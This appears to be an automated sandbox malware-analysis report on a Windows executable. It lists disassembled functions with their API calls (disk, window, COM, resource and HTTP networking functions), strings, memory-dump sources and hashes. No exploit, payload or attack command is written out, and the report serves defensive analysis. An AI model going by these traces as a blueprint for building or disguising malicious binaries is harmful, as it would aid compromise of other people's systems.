                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00F2E396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F2E40C
                                                                                        • GetLastError.KERNEL32 ref: 00F2E416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00F2E483
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: 06453a7c48e8744fa6e024918c2908214d7154d0120562226c77645fa92630d5
                                                                                        • Instruction ID: d4dad8ef2dcadafc2d8527687e44ec66bdebe93fbca1644d52f58b3a61de3b08
                                                                                        • Opcode Fuzzy Hash: 06453a7c48e8744fa6e024918c2908214d7154d0120562226c77645fa92630d5
                                                                                        • Instruction Fuzzy Hash: 11319239E002199FDB01EB64EC45EAEB7F4EF18314F248015E515EB291DB71EA02E791
                                                                                        Function 00F1B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F1B98C
                                                                                        • GetDlgCtrlID.USER32 ref: 00F1B997
                                                                                        • GetParent.USER32 ref: 00F1B9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1B9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F1B9BF
                                                                                        • GetParent.USER32(?), ref: 00F1B9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1B9DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 1e2a3b22469af45b6f5af56fa7440a9344f509c6f8db813110ce75516e0bd0c9
                                                                                        • Instruction ID: 4e709a93f0477b6a48a6b45661ec2891e70210b3e0cae3c65158f0dd1c0be01c
                                                                                        • Opcode Fuzzy Hash: 1e2a3b22469af45b6f5af56fa7440a9344f509c6f8db813110ce75516e0bd0c9
                                                                                        • Instruction Fuzzy Hash: A521C475E00108BFDF04ABA5CC85EFEB7B5EB45310B500115F561A72A1DBB95856FB20
                                                                                        Function 00F1B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F1BA73
                                                                                        • GetDlgCtrlID.USER32 ref: 00F1BA7E
                                                                                        • GetParent.USER32 ref: 00F1BA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1BA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F1BAA6
                                                                                        • GetParent.USER32(?), ref: 00F1BAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1BAC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 10698b4a543d81f2d843632813aa203e41d6bb267c78862face063e60059036c
                                                                                        • Instruction ID: e323e1f4e65ce8defc287d2eadeef05d4ae17df6284e4ec0821de3a7e599b537
                                                                                        • Opcode Fuzzy Hash: 10698b4a543d81f2d843632813aa203e41d6bb267c78862face063e60059036c
                                                                                        • Instruction Fuzzy Hash: C321B375E00148BFDF00AB65CC85EFEB7B9EF45300F100015F951A31A1DBB99956BB21
                                                                                        Function 00F1BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00F1BAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00F1BAF8
                                                                                        • _wcscmp.LIBCMT ref: 00F1BB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F1BB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 4c54d8aa1704ee1024333c0b914fcd64fc492bddd95a8861c84944425c8aeb24
                                                                                        • Instruction ID: ed004df21dfce2c6e84a058e86bc2606974114d241b8623946dbaa0262837a80
                                                                                        • Opcode Fuzzy Hash: 4c54d8aa1704ee1024333c0b914fcd64fc492bddd95a8861c84944425c8aeb24
                                                                                        • Instruction Fuzzy Hash: F21106B7A0C307F9FA24B625DC16EE6779CDB51330F200022F914E54E5EFAAA8917515
                                                                                        Function 00F3B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3B2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F3B302
                                                                                        • CoUninitialize.OLE32 ref: 00F3B30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00F3B40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F3B539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00F3B56D
                                                                                        • CoGetObject.OLE32(?,00000000,00F6D91C,?), ref: 00F3B590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F3B5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F3B623
                                                                                        • VariantClear.OLEAUT32(00F6D91C), ref: 00F3B633
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: eaf9c568a84e218018d4318fe128eacfb57940d23654f11ff5da5f91d4e7b18a
                                                                                        • Instruction ID: e033b4edad6c234559d85be705074f945eb3128b147d11c1bf4527843ae57e07
                                                                                        • Opcode Fuzzy Hash: eaf9c568a84e218018d4318fe128eacfb57940d23654f11ff5da5f91d4e7b18a
                                                                                        • Instruction Fuzzy Hash: BFC12371608305AFC700DF69C894A2BB7E9FF88324F04495DFA8A9B251DB71ED05DB52
                                                                                        Function 00F0ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00F0ACC1
                                                                                          • Part of subcall function 00F07CF4: __mtinitlocknum.LIBCMT ref: 00F07D06
                                                                                          • Part of subcall function 00F07CF4: EnterCriticalSection.KERNEL32(00000000,?,00F07ADD,0000000D), ref: 00F07D1F
                                                                                        • __calloc_crt.LIBCMT ref: 00F0ACD2
                                                                                          • Part of subcall function 00F06986: __calloc_impl.LIBCMT ref: 00F06995
                                                                                          • Part of subcall function 00F06986: Sleep.KERNEL32(00000000,000003BC,00EFF507,?,0000000E), ref: 00F069AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F0ACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00F96E28,00000064,00F05E91,00F96C70,00000014), ref: 00F0AD46
                                                                                        • __calloc_crt.LIBCMT ref: 00F0AD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 00F0ADD8
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00F0AE11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1426640281-0
                                                                                        • Opcode ID: 4e86853a1e1b45678e696a4cf18986eeb950375475fdd4b865885b42064de191
                                                                                        • Instruction ID: 81b543c13e15e1f4285ff537ec8a87cb505543cfc1e46f185c1960b51ddae03b
                                                                                        • Opcode Fuzzy Hash: 4e86853a1e1b45678e696a4cf18986eeb950375475fdd4b865885b42064de191
                                                                                        • Instruction Fuzzy Hash: 4781B2B1E053458FDB14CF68C8806AABBF0AF4A335B24425DD4A6AB3D1D7349803FB56
                                                                                        Function 00F267E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00F267FD
                                                                                        • __swprintf.LIBCMT ref: 00F2680A
                                                                                          • Part of subcall function 00F0172B: __woutput_l.LIBCMT ref: 00F01784
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F26834
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00F26840
                                                                                        • LockResource.KERNEL32(00000000), ref: 00F2684D
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00F2686D
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00F2687F
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00F2688E
                                                                                        • LockResource.KERNEL32(?), ref: 00F2689A
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F268F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID:
                                                                                        • API String ID: 1433390588-0
                                                                                        • Opcode ID: bfae66cc6b987156cd1d515cd42399f472835830000bcc70a0c36ce172794f49
                                                                                        • Instruction ID: 8d26ea42cd979e2ece7c3dede1f817b4e0ba0152cf8be37311531aee3268fc27
                                                                                        • Opcode Fuzzy Hash: bfae66cc6b987156cd1d515cd42399f472835830000bcc70a0c36ce172794f49
                                                                                        • Instruction Fuzzy Hash: E9318DB1A0022AABDB119FA0ED55AFB7BA8FF08350F008425F912D2150E774D951FBB0
                                                                                        Function 00F5DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00EFB496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00EFB4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00EFB4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00EFB4BD
                                                                                        • GetClientRect.USER32(?), ref: 00F5DD63
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F5DD7A
                                                                                        • GetWindowDC.USER32(?), ref: 00F5DD86
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00F5DD95
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5DDA7
                                                                                        • GetSysColor.USER32(00000005), ref: 00F5DDC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        • Opcode ID: 333e55dc93e11e75f8f4956c6ae1056674423cbbbba7d4e46fc42d625f2af921
                                                                                        • Instruction ID: 0c05a99af76079e11b81c476076fcec350d8cbf1eb87301e67b6385ae3276cb1
                                                                                        • Opcode Fuzzy Hash: 333e55dc93e11e75f8f4956c6ae1056674423cbbbba7d4e46fc42d625f2af921
                                                                                        • Instruction Fuzzy Hash: E1118131A00209EFDB216F64EC08BE93B75EB05325F108221FA76A50E1DBB24941FF21
                                                                                        Function 00F1CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00F1CF50), ref: 00F1CE90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: f59a31ad39a5d48720feb334e118c59fbed44a485ba50ca3bd9acdcf32076b6c
                                                                                        • Instruction ID: 65bdf1f3e4f287fdf079b6a3659638eb6a8d2e7ee975302942a0e6fab0335f94
                                                                                        • Opcode Fuzzy Hash: f59a31ad39a5d48720feb334e118c59fbed44a485ba50ca3bd9acdcf32076b6c
                                                                                        • Instruction Fuzzy Hash: 8A91D631A0064AABCB18DF60C881BEAFBB4BF44310F508529E559B7191DF30799AFBD0
                                                                                        Function 00EE3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EE30DC
                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00EE3181
                                                                                        • UnregisterHotKey.USER32(?), ref: 00EE32A9
                                                                                        • DestroyWindow.USER32(?), ref: 00F55079
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F550F8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F55125
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 1cac190dd7214ee03b16a5b93d412f6a8fbf6f4b2e7cc980d0883107f3a22150
                                                                                        • Instruction ID: fe49d190c2e099efcbe69b08ccbb311c2a4f8feee32e6867e8dec16e26e511e7
                                                                                        • Opcode Fuzzy Hash: 1cac190dd7214ee03b16a5b93d412f6a8fbf6f4b2e7cc980d0883107f3a22150
                                                                                        • Instruction Fuzzy Hash: E7914C7060028ACFC715EF25C899B69F3E4FF04705F5451A9E50AB72A2DB70AE1ADF40
                                                                                        Function 00EFCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00EFCC15
                                                                                          • Part of subcall function 00EFCCCD: GetClientRect.USER32(?,?), ref: 00EFCCF6
                                                                                          • Part of subcall function 00EFCCCD: GetWindowRect.USER32(?,?), ref: 00EFCD37
                                                                                          • Part of subcall function 00EFCCCD: ScreenToClient.USER32(?,?), ref: 00EFCD5F
                                                                                        • GetDC.USER32 ref: 00F5D137
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F5D14A
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F5D158
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F5D16D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5D175
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F5D200
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: 2e4ccc12a987772b9764117b0362b495e54c20c406979c284553ebe91436272d
                                                                                        • Instruction ID: 2eac6ffc3ec4a5b994bd3932b31621ca6a1e6267acfcdd98a3643e5869c97821
                                                                                        • Opcode Fuzzy Hash: 2e4ccc12a987772b9764117b0362b495e54c20c406979c284553ebe91436272d
                                                                                        • Instruction Fuzzy Hash: E0710E31901209DFDF31DF64CC80AFA7BB1FF48366F244269EE55AA2A6C7318845EB50
                                                                                        Function 00F4ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                          • Part of subcall function 00EFB63C: GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                          • Part of subcall function 00EFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00F4ED3C
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00F4ED42
                                                                                        • ReleaseCapture.USER32 ref: 00F4ED48
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00F4EDF0
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F4EE03
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00F4EEDC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                        • API String ID: 1924731296-2107944366
                                                                                        • Opcode ID: 130d329a71ff49d9b0d3579073dd52fa48ca3044406f8c6b8551c00b8e3aec6f
                                                                                        • Instruction ID: d26c97512d969876346ef26313514e359f6822b7d63e22d3d5479d35b2945a09
                                                                                        • Opcode Fuzzy Hash: 130d329a71ff49d9b0d3579073dd52fa48ca3044406f8c6b8551c00b8e3aec6f
                                                                                        • Instruction Fuzzy Hash: 1551AC70604308AFD710DF24CC96F6A7BE4FB88314F14492DF995A72E2DBB0A904EB52
                                                                                        Function 00F345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F345FF
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F3462B
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F3466D
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F34682
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F3468F
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F346BF
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F34706
                                                                                          • Part of subcall function 00F35052: GetLastError.KERNEL32(?,?,00F343CC,00000000,00000000,00000001), ref: 00F35067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
